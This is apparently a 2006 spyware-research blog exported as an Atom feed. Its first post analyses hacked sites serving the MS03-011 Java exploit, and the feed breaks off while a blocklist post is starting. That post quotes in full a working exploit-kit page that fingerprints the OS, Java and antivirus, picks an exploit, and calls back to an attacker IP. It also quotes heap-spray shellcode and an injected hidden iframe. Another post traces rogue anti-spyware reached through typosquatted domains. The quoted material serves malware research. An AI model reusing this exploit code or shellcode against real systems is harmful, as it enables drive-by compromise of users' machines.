<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-19736909</id><updated>2011-12-14T18:46:55.554-08:00</updated><title type='text'>Spyware Investigations</title><subtitle type='html'>adware malware spyware viruses</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://spywarehunt.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/19736909/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://spywarehunt.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>pen</name><uri>http://www.blogger.com/profile/09864726096628334525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>6</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-19736909.post-114529686952387277</id><published>2006-04-17T10:40:00.000-07:00</published><updated>2006-04-22T15:53:52.946-07:00</updated><title type='text'>Malicious site? or hacked site?</title><content type='html'>At-risk user behavior, or innocent user behavior?&lt;br /&gt;&lt;br /&gt;2hjb.net downloads ms0311.jar, which includes Installer.class, which includes an exploit of the vulnerability addressed by the Micorosft Java Virtual Machine security update security bulletin MS03-011.&lt;br /&gt;&lt;br /&gt;www.2hjb.net/ms0311.jar (Installer.class) JAVA_BYTEVER.BE&lt;br /&gt;www.2hjb.net/ie0604.htm&lt;br /&gt;www.2hjb.net/cgi-bin/ie0604.cgi?bug=MS03-11&amp;SP1&lt;br /&gt;&lt;br /&gt;2hjb.net had been registered the day before. It is apparently a Lithuanian&lt;br /&gt;job placement company. Owned by Robin Lee of Emeryville, CA? This sounds&lt;br /&gt;suspicious.&lt;br /&gt;&lt;br /&gt;Similarly, lauritoandlaurito.com and telecarrier.es deliver ms0311.jar.&lt;br /&gt;&lt;br /&gt;lauritoandlaurito.com/ms0311.jar (Installer.class) JAVA_BYTEVER.BE&lt;br /&gt;&lt;br /&gt;Laurito &amp; Laurito, LLC (Law firm specializing in foreclosures in Ohio.&lt;br /&gt;Also one of Ohio's top real estate firms. Go figure.)&lt;br /&gt;&lt;br /&gt;www.telecarrier.es/ms0311.jar (Installer.class) JAVA_BYTEVER.BE&lt;br /&gt;www.telecarrier.es/ms0311.jar (TakePrivileges.class) JAVA_BYTEVER.BE&lt;br /&gt;www.telecarrier.es/ie0604.htm&lt;br /&gt;www.telecarrier.es/cgi-bin/ie0604.cgi?exploit=MS03-11&lt;br /&gt;&lt;br /&gt;Telecarrier S.L. (Spain's telecommunications giant)&lt;br /&gt;&lt;br /&gt;Similarly, the web site of "Performance Cycle of Colorado" (www[.]performancecycle.com) will connect to 66.36.240.109/ie0604.htm which kicks in 66.36.240.109/cgi-bin/ie0604.cgi?bug=0day&amp;SP2 and 66.36.240.109/cgi-bin/ie0604.cgi?exploit=0day&lt;br /&gt;&lt;br /&gt;66.36.240.109/cgi-bin/ie0604.cgi is something called "Web-Attacker Control panel". The prompt says "Please enter the password to access the statistics".&lt;br /&gt;&lt;br /&gt;A person whose web site was similarly hacked reports that this code was added to their web page:&lt;br /&gt;&lt;br /&gt;&amp;lt;iframe src='http://66.36.240.109/ie0601.htm' width=1 height=1&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;&lt;br /&gt;It displays a page saying under construction, which then redirects to an annoying little javascript window, which locks up your browser.&lt;br /&gt;I looked at the code of the 'Under Construction' page- It is as follows:&lt;br /&gt;&lt;br /&gt;&lt;font face="System"&gt;&amp;lt;HTML xmlns:IE&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;TITLE&amp;gt;Demo page&amp;lt;/TITLE&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;HEAD&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;STYLE type='text/css'&amp;gt;&lt;br /&gt;&lt;br /&gt;IE\:clientCaps {behavior:url(#default#clientcaps)}&lt;br /&gt;&lt;br /&gt;&amp;lt;/STYLE&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;/HEAD&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;BODY onLoad=&amp;quot;setTimeout('Run_BOF()',2000);&amp;quot;&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;CENTER&amp;gt;&amp;lt;H1&amp;gt;This site is under construction...&amp;lt;/H1&amp;gt;&amp;lt;/CENTER&amp;gt;&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;font face="System"&gt;&amp;lt;IFRAME name=&amp;quot;StatPage&amp;quot; width=5 height=5 style=&amp;quot;display:none&amp;quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;IFRAME name=&amp;quot;PageContainer&amp;quot; width=5 height=5 style=&amp;quot;display:none&amp;quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;DIV id=&amp;quot;ObjectContainer&amp;quot;&amp;gt;&amp;lt;/DIV&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;IE:clientCaps ID=&amp;quot;oClientCaps&amp;quot; /&amp;gt; &lt;br /&gt;&lt;br /&gt;&amp;lt;script type=&amp;quot;text/javascript&amp;quot; language=&amp;quot;JavaScript&amp;quot;&amp;gt;&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;var ExploitNumber=0; &lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;function GetVersion(CLSID)&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;if (oClientCaps.isComponentInstalled(CLSID,&amp;quot;Component  ID&amp;quot;))&lt;br /&gt;&lt;br /&gt;{return oClientCaps.getComponentVersion(CLSID,&amp;quot;ComponentID  &amp;quot;).split(&amp;quot;,&amp;quot;);}&lt;br /&gt;&lt;br /&gt;else&lt;br /&gt;&lt;br /&gt;{return Array(0,0,0,0);}&lt;br /&gt;&lt;br /&gt;}&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;font face="System"&gt;function Get_Win_Version(IE_vers)&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;if (IE_vers.indexOf('Windows 95') != -1) return &amp;quot;95&amp;quot;&lt;br /&gt;&lt;br /&gt;else if (IE_vers.indexOf('Windows NT 4') != -1) return &amp;quot;NT&amp;quot;&lt;br /&gt;&lt;br /&gt;else if (IE_vers.indexOf('Win 9x 4.9') != -1) return &amp;quot;ME&amp;quot;&lt;br /&gt;&lt;br /&gt;else if (IE_vers.indexOf('Windows 98') != -1) return &amp;quot;98&amp;quot;&lt;br /&gt;&lt;br /&gt;else if (IE_vers.indexOf('Windows NT 5.0') != -1) return &amp;quot;2K&amp;quot;&lt;br /&gt;&lt;br /&gt;else if (IE_vers.indexOf('Windows NT 5.1') != -1) return &amp;quot;XP&amp;quot;&lt;br /&gt;&lt;br /&gt;else if (IE_vers.indexOf('Windows NT 5.2') != -1) return &amp;quot;2K3&amp;quot;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;function Run_BOF()&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;if (ExploitNumber==4)&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;self.focus();&lt;br /&gt;&lt;br /&gt;for (i=1 ; i &amp;lt;=4 ; i++)&lt;br /&gt;&lt;br /&gt;{ &lt;br /&gt;&lt;br /&gt;document.writeln('&amp;lt;iframe width=1 height=1 border=0 frameborder=0 src=&amp;quot;pluginst.htm&amp;quot;&amp;gt;&amp;lt;/iframe&amp;gt;');&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;document.writeln('&amp;lt;iframe width=1 height=1 border=0 frameborder=0 src=&amp;quot;ie0601d.htm&amp;quot;&amp;gt;&amp;lt;/iframe&amp;gt;');&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;var CGI_Script=&amp;quot;&lt;/font&gt;&lt;a href="http://66.36.240.109/cgi-bin/ie0601.cgi" target="_blank"&gt;&lt;font face="System"&gt;http://&lt;b style="color:black;background-color:#ffff66"&gt;66.36.240.109&lt;/b&gt;/cgi-bin/ie0601.cgi&lt;/font&gt;&lt;/a&gt;&lt;font face="System"&gt;&amp;quot;;&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;if (navigator.appName==&amp;quot;Microsoft Internet Explorer&amp;quot;)&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;Click_Request=CGI_Script+&amp;quot;?click&amp;quot;;&lt;br /&gt;&lt;br /&gt;var InetPath=document.location.href;&lt;br /&gt;&lt;br /&gt;j=InetPath.lastIndexOf('/');&lt;br /&gt;&lt;br /&gt;InetPath=InetPath.slice(0,j);&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;var IEversion=navigator.appVersion;&lt;br /&gt;&lt;br /&gt;var IEplatform=navigator.platform;&lt;br /&gt;&lt;br /&gt;if (IEplatform.search(&amp;quot;Win32&amp;quot;) != -1)&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;var WinOS=Get_Win_Version(IEversion);&lt;br /&gt;&lt;br /&gt;FullVersion=clientInformation.appMinorVersion;&lt;br /&gt;&lt;br /&gt;PatchList=FullVersion.split(&amp;quot;;&amp;quot;);&lt;br /&gt;&lt;br /&gt;for (var i=0; i &amp;lt; PatchList.length; i++)&lt;br /&gt;&lt;br /&gt;{ &lt;br /&gt;&lt;br /&gt;ServicePack=PatchList[i];&lt;br /&gt;&lt;br /&gt;j=ServicePack.indexOf('SP');&lt;br /&gt;&lt;br /&gt;if (j != -1)&lt;br /&gt;&lt;br /&gt;{ &lt;br /&gt;&lt;br /&gt;ServicePack=ServicePack.substr(j);&lt;br /&gt;&lt;br /&gt;Click_Request=Click_Request+'&amp;amp;'+ServicePack; &lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;StatPage.location=Click_Request;&lt;br /&gt;&lt;br /&gt;var JVM_vers = GetVersion(&amp;quot;{08B0E5C0-4FCB-11CF-AAA5-00401C608500}&amp;quot;); &lt;br /&gt;&lt;br /&gt;var IE_vers = GetVersion(&amp;quot;{89820200-ECBD-11CF-8B85-00AA005B4383}&amp;quot;);&lt;br /&gt;&lt;br /&gt;fNortonAV=0; fMcAfee=0; XP_SP2_patched=0;&lt;br /&gt;&lt;br /&gt;try&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;var oNortonAV=new ActiveXObject(&amp;quot;NAVCfgWizDll.NAVCfgWizMgr&amp;quot;); //Norton Antivirus Config Wizard initialization&lt;br /&gt;&lt;br /&gt;fNortonAV=1;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;catch(e){} &lt;br /&gt;&lt;br /&gt;try&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;var oMcAfee=new ActiveXObject(&amp;quot;McGDMgr.DwnldGroupMgr&amp;quot;); // McAfee Security Download Control initialization &lt;br /&gt;&lt;br /&gt;fMcAfee=1;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;catch(e){}&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;font face="System"&gt;switch (WinOS)&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;case &amp;quot;2K&amp;quot;:&lt;br /&gt;&lt;br /&gt;if ((JVM_vers[0]!=0)&amp;amp;&amp;amp;(JVM_vers[2]&amp;lt;3810))&lt;br /&gt;&lt;br /&gt;{ ExploitNumber=1; } &lt;br /&gt;&lt;br /&gt;else // if JVM = 5.0.3810.0 or higher&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;if ((fNortonAV==0)&amp;amp;&amp;amp;(fMcAfee==0))&lt;br /&gt;&lt;br /&gt;{ ExploitNumber=3; } &lt;br /&gt;&lt;br /&gt;else&lt;br /&gt;&lt;br /&gt;{ ExploitNumber=2; } &lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;break;&lt;br /&gt;&lt;br /&gt;case &amp;quot;2K3&amp;quot;:&lt;br /&gt;&lt;br /&gt;if ((fNortonAV==0)&amp;amp;&amp;amp;(fMcAfee==0))&lt;br /&gt;&lt;br /&gt;{ ExploitNumber=3; } &lt;br /&gt;&lt;br /&gt;else&lt;br /&gt;&lt;br /&gt;{ ExploitNumber=4; } &lt;br /&gt;&lt;br /&gt;break; &lt;br /&gt;&lt;br /&gt;case &amp;quot;XP&amp;quot;:&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;if ((JVM_vers[0]!=0)&amp;amp;&amp;amp;(JVM_vers[2]&amp;lt;3810))&lt;br /&gt;&lt;br /&gt;{ ExploitNumber=1; } &lt;br /&gt;&lt;br /&gt;else // if JVM = 5.0.3810.0 or higher&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;for (var i=0; i &amp;lt; PatchList.length; i++)&lt;br /&gt;&lt;br /&gt;{ &lt;br /&gt;&lt;br /&gt;if (PatchList[i]==&amp;quot;SP2&amp;quot;)&lt;br /&gt;&lt;br /&gt;{ XP_SP2_patched=1; }&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;if (XP_SP2_patched==0)&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;if ((fNortonAV==0)&amp;amp;&amp;amp;(fMcAfee==0))&lt;br /&gt;&lt;br /&gt;{ ExploitNumber=3; } &lt;br /&gt;&lt;br /&gt;else&lt;br /&gt;&lt;br /&gt;{ ExploitNumber=4; } &lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;else&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;if ((fNortonAV==0)&amp;amp;&amp;amp;(fMcAfee==0))&lt;br /&gt;&lt;br /&gt;{ ExploitNumber=5; } &lt;br /&gt;&lt;br /&gt;else&lt;br /&gt;&lt;br /&gt;{ ExploitNumber=4; } &lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;break; &lt;br /&gt;&lt;br /&gt;default: &lt;br /&gt;&lt;br /&gt;if ((JVM_vers[0]!=0)&amp;amp;&amp;amp;(JVM_vers[2]&amp;lt;3810))&lt;br /&gt;&lt;br /&gt;{ ExploitNumber=1; } &lt;br /&gt;&lt;br /&gt;else&lt;br /&gt;&lt;br /&gt;{ ExploitNumber=2; } // if JVM = 5.0.3810.0 or higher&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;break; &lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;// launching exploit which number is depends on Windows and IE versions&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;switch (ExploitNumber)&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;case 1:&lt;br /&gt;&lt;br /&gt;Trojan_Path=CGI_Script+&amp;quot;?exploit=MS03-11&amp;quot;;&lt;br /&gt;&lt;br /&gt;ObjectContainer.innerHTML='&amp;lt;applet archive=&amp;quot;'+InetPath+'/'+'ie0601a.jar&amp;quot; codebase=&amp;quot;'+InetPath+'&amp;quot; code=&amp;quot;TakePrivileges.class&amp;quot; width=1 height=1&amp;gt;&amp;lt;param name=&amp;quot;ModulePath&amp;quot; value=&amp;quot;'+Trojan_Path+'&amp;quot;&amp;gt;&amp;lt;/applet&amp;gt;';&lt;br /&gt;&lt;br /&gt;break;&lt;br /&gt;&lt;br /&gt;case 2:&lt;br /&gt;&lt;br /&gt;CHM_base='//ie0601b.chm'+'::'+'/main.htm'; &lt;br /&gt;&lt;br /&gt;Protocol=unescape(&amp;quot;%6ds-i%74s:%6dh%74%6dl:&amp;quot;);&lt;br /&gt;&lt;br /&gt;Init_String=Protocol+'file://'+'C:\\MAIN.MHT!'+InetPath+CHM_base;&lt;br /&gt;&lt;br /&gt;oMSITS=document.createElement(&amp;quot;&amp;lt;OBJECT data='&amp;quot;+Init_String+&amp;quot;' type='text/x-scriptlet'&amp;gt;&amp;lt;/OBJECT&amp;gt;&amp;quot;); &lt;br /&gt;&lt;br /&gt;document.body.appendChild(oMSITS); &lt;br /&gt;&lt;br /&gt;document.title=&amp;quot;Loaded !&amp;quot;; &lt;br /&gt;&lt;br /&gt;break;&lt;br /&gt;&lt;br /&gt;case 3:&lt;br /&gt;&lt;br /&gt;window.open(&amp;quot;ie0601c.htm&amp;quot;,&amp;quot;Info&amp;quot;,&amp;quot;left=2000,top=20  00,screenX=2000,screenY=2000,width=50,height=50,sc  rollbars=1,menubar=0,titlebar=0,toolbar=0,status=0  &amp;quot;); &lt;br /&gt;&lt;br /&gt;self.focus();&lt;br /&gt;&lt;br /&gt;break; &lt;br /&gt;&lt;br /&gt;case 4:&lt;br /&gt;&lt;br /&gt;;setTimeout('Run_BOF()',2000); &lt;br /&gt;&lt;br /&gt;break;&lt;br /&gt;&lt;br /&gt;case 5:&lt;br /&gt;&lt;br /&gt;PageContainer.location=&amp;quot;ie0601e.wmf&amp;quot;;&lt;br /&gt;&lt;br /&gt;break; &lt;br /&gt;&lt;br /&gt;default:&lt;br /&gt;&lt;br /&gt;break; &lt;br /&gt;&lt;br /&gt;}&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;font face="System"&gt;}&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;else if (navigator.appName==&amp;quot;Netscape&amp;quot;)&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;StatPage.location=CGI_Script+&amp;quot;?click&amp;quot;;&lt;br /&gt;&lt;br /&gt;if (navigator.userAgent.indexOf('Firefox') != -1)&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;PageContainer.location=&amp;quot;mfsa0601.htm&amp;quot;;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;else&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;StatPage.location=CGI_Script+&amp;quot;?click&amp;quot;;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;/BODY&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;/HTML&amp;gt;&lt;/font&gt;&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;The page it redirects to (for me, anyhow) has code as follows:&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;font face="System"&gt;&amp;lt;HTML&amp;gt;&amp;lt;HEAD&amp;gt;&amp;lt;SCRIPT language=&amp;quot;javascript&amp;quot;&amp;gt;&lt;br /&gt;&lt;br /&gt;function SpreadShellCode() {&lt;br /&gt;&lt;br /&gt;var i = 0;&lt;br /&gt;&lt;br /&gt;var eip = &amp;quot;&amp;quot;;&lt;br /&gt;&lt;br /&gt;var mem_block = &amp;quot;&amp;quot;;&lt;br /&gt;&lt;br /&gt;for (i=1 ; i &amp;lt;=500 ; i++)&lt;br /&gt;&lt;br /&gt;{eip = eip + unescape(&amp;quot;%u7030&amp;quot;)+unescape(&amp;quot;%u4300&amp;quot;);}&lt;br /&gt;&lt;br /&gt;var init_shellcode = &amp;quot;&amp;quot;;&lt;br /&gt;&lt;br /&gt;var main_shellcode = &amp;quot;&amp;quot;;&lt;br /&gt;&lt;br /&gt;var full_shellcode = &amp;quot;&amp;quot;;&lt;br /&gt;&lt;br /&gt;for (i=1 ; i&amp;lt;=200; i++)&lt;br /&gt;&lt;br /&gt;{mem_block = mem_block + eip;}&lt;br /&gt;&lt;br /&gt;init_shellcode=unescape(&amp;quot;%u9090%u9090%u9090%u42ba%  u4241%u8141%u11f2%u1111%u4111%u1139%ufb75%uf18b%uf  88b%u3357%u66c9%u25b9%ufc01%ua4f3%uff5f%u90e7&amp;quot;);&lt;br /&gt;&lt;br /&gt;main_shellcode=unescape(&amp;quot;%u5053%u5053%u3390%u33c0%  uebc9%u5e12%ub966%u0103%ufe8b%u2e80%u8005%u0336%ue  246%uebf7%ue805%uffe9%uffff%u5ced%u7b8d%u8d44%u327  c%u0580%u5afb%u7a8d%u0528%u35fb%u4fcf%ub347%udd35%  u113a%u1cc2%u4030%u7cf6%uc710%u13cd%ude05%ued48%u3  df1%u7be1%u62e9%u628d%u052c%u6ae3%u148d%u8d4d%u246  2%ue305%u0c8d%u058d%uc5cb%u565b%u5354%u5251%u4c32%  u5454%u4508%u643e%u3279%u806b%u086b%uc835%u056c%u3  848%u1480%u488d%u8d14%u2478%u8db3%u1048%u0fed%u488  d%u933c%u8448%u488d%u9b44%u92c1%u1252%uf0f4%u018c%  u0101%uf485%u850c%u2c34%u0144%u9bd8%uc158%u1e3a%u7  831%u71f0%u0101%u8d01%u2c5c%u9304%ube56%udd35%u555  5%ued56%u552c%ud801%uc163%u02a0%u128e%u55f0%u0101%  u8501%u0cf4%u3485%u662c%ud801%u82c1%ue6e0%uf075%u0  148%u0101%u0156%uf0d8%u01d9%u0101%u7c70%u787c%u313  e%u3a31%u323a%u3a35%u3632%u383c%u3732%u3f38%u6531%  u6f69%u6633%u726f%u6f31%u386b%u383a%u3237%u6965%u4  16f%u806b%u7478%u6f71%u437c%u5553%u3b38%u3833%u3c3  b%u0008&amp;quot;);&lt;br /&gt;&lt;br /&gt;full_shellcode = init_shellcode+main_shellcode;&lt;br /&gt;&lt;br /&gt;mem_block = mem_block+full_shellcode;&lt;br /&gt;&lt;br /&gt;prompt(mem_block,&amp;quot;Javascript initialized&amp;quot;);&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&amp;lt;/SCRIPT&amp;gt;&amp;lt;/HEAD&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;BODY onload=&amp;quot;setTimeout('SpreadShellCode()',2000)&amp;quot;&amp;gt;&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;These web sites were probably poisoned.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/19736909-114529686952387277?l=spywarehunt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spywarehunt.blogspot.com/feeds/114529686952387277/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=19736909&amp;postID=114529686952387277' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/19736909/posts/default/114529686952387277'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/19736909/posts/default/114529686952387277'/><link rel='alternate' type='text/html' href='http://spywarehunt.blogspot.com/2006/04/malicious-site-or-hacked-site.html' title='Malicious site? or hacked site?'/><author><name>pen</name><uri>http://www.blogger.com/profile/09864726096628334525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-19736909.post-114091074602781295</id><published>2006-02-25T15:20:00.000-08:00</published><updated>2006-04-22T15:24:46.890-07:00</updated><title type='text'>How spyware gets installed (2)</title><content type='html'>&lt;a href="http://photos1.blogger.com/blogger/6156/1959/1600/poy%20roast.jpg"&gt;&lt;img style="FLOAT: right; MARGIN: 0px 0px 10px 10px; CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/6156/1959/320/poy%20roast.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Misspell "pot roast" as "poy roast" when searching for pot roast recipes. Notice that the web sites returned were designed to match misspelled words.&lt;br /&gt;&lt;br /&gt;If you are unfortunate enough to select pot-roast-recipes.ioust.behavest.net, you find yourself trapped in a loop that tries to install software from WinSoftware Corporation, Inc.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://samspade.org/t/whois?a=behavest.net&amp;server=magic"&gt;WHOIS behavest.net&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;Andreas Tores        andreas@winouxis.com&lt;br /&gt;Direccion General de Areas Protegidas&lt;br /&gt;Km 12.5 Carretera Norte Moduna 3102&lt;br /&gt;Managua, Nicaragua&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;behavest.net insists you install WinAntiSpyware.&lt;br /&gt;WinAntiSpyware will report that you have serious system errors and insist you buy and install WinFixer.&lt;br /&gt;Instead, use Task Manager to close the browser window. Do not install this particular WinAntiSpyware.&lt;br /&gt;&lt;br /&gt;There could be a legimate WinAntiSpyware.com. The WinAntiSpyware web site agrees (in their terms and conditions) to agree to settle disputes according to the laws of Nevada. The General section of their license agreement indicates that the laws of the state of Nevada govern their agreement. There are two different "license agreement" web pages and two different "terms and conditions" web pages. The home page has links to "Terms and Conditions" and "License Information" and "Buy Now". "Buy Now" has different "Terms and Conditions" and "License Agreement" links. Other than references to Nevada, there is no reference to where WinAntiSpyware might be located.&lt;br /&gt;&lt;br /&gt;The domain name WinAntiSpyware.com is registered using an address in Kiev.&lt;br /&gt;&lt;br /&gt;winantivirus.com = [ 66.244.254.64 ]&lt;br /&gt;winantispyware.com = [ 66.244.254.64 ]&lt;br /&gt;winantiviruspro.com = [ 66.244.254.63 ]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Note: The next day pot-roast-recipes.ioust.behavest.net was not available. Instead, pot-roast-gravy.toms.frcollect.org had an equivalent effect.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://samspade.org/t/whois?a=frcollect.org&amp;amp;server=magic"&gt;WHOIS frcollect.org&lt;/a&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;Shuratani Laskari&lt;br /&gt;1859/14 Salcedo Street&lt;br /&gt;Legaspi Village Makati City&lt;br /&gt;Manila&lt;br /&gt;Phillipines&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Registration information created a few days earlier and updated that day.&lt;br /&gt;&lt;br /&gt;On March 3 the equivalent URL was cooking-pot-roast.buseon.seenfussy.com.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://samspade.org/t/whois?a=seenfussy.com&amp;amp;server=magic"&gt;WHOIS seenfussy.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;Andreas Tores        (andreas@winouxis.com)&lt;br /&gt;Direccion General de Areas Protegidas&lt;br /&gt;Km 12.5 Carretera Norte, Moduna # 3102&lt;br /&gt;Managua&lt;br /&gt;,3289&lt;br /&gt;NI&lt;br /&gt;Tel. +505.2331279&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Registration was created 27-Feb-2006.&lt;br /&gt;&lt;br&gt;See also: &lt;a href="http://www.symantec.com/avcenter/venc/data/winantispyware.html"&gt;Symantec&lt;/a&gt; description of WinAntiSpyware&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/19736909-114091074602781295?l=spywarehunt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spywarehunt.blogspot.com/feeds/114091074602781295/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=19736909&amp;postID=114091074602781295' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/19736909/posts/default/114091074602781295'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/19736909/posts/default/114091074602781295'/><link rel='alternate' type='text/html' href='http://spywarehunt.blogspot.com/2006/02/how-spyware-gets-installed-2.html' title='How spyware gets installed (2)'/><author><name>pen</name><uri>http://www.blogger.com/profile/09864726096628334525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-19736909.post-114075179710950664</id><published>2006-02-23T18:58:00.000-08:00</published><updated>2006-10-06T11:14:57.026-07:00</updated><title type='text'>Block traffmoney.biz, traffnew.biz, traffbest.biz, traffweb.biz, traffdollars.biz, traffsale1.biz, traffbucks.biz &amp; traffcool.biz</title><content type='html'>traffmoney.biz, traffnew.biz, traffbest.biz, traffweb.biz, traffdollars.biz, traffsale1.biz, traffbucks.biz and traffcool.biz deliver threats. All three web sites are at one address: 85.249.23.119&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br 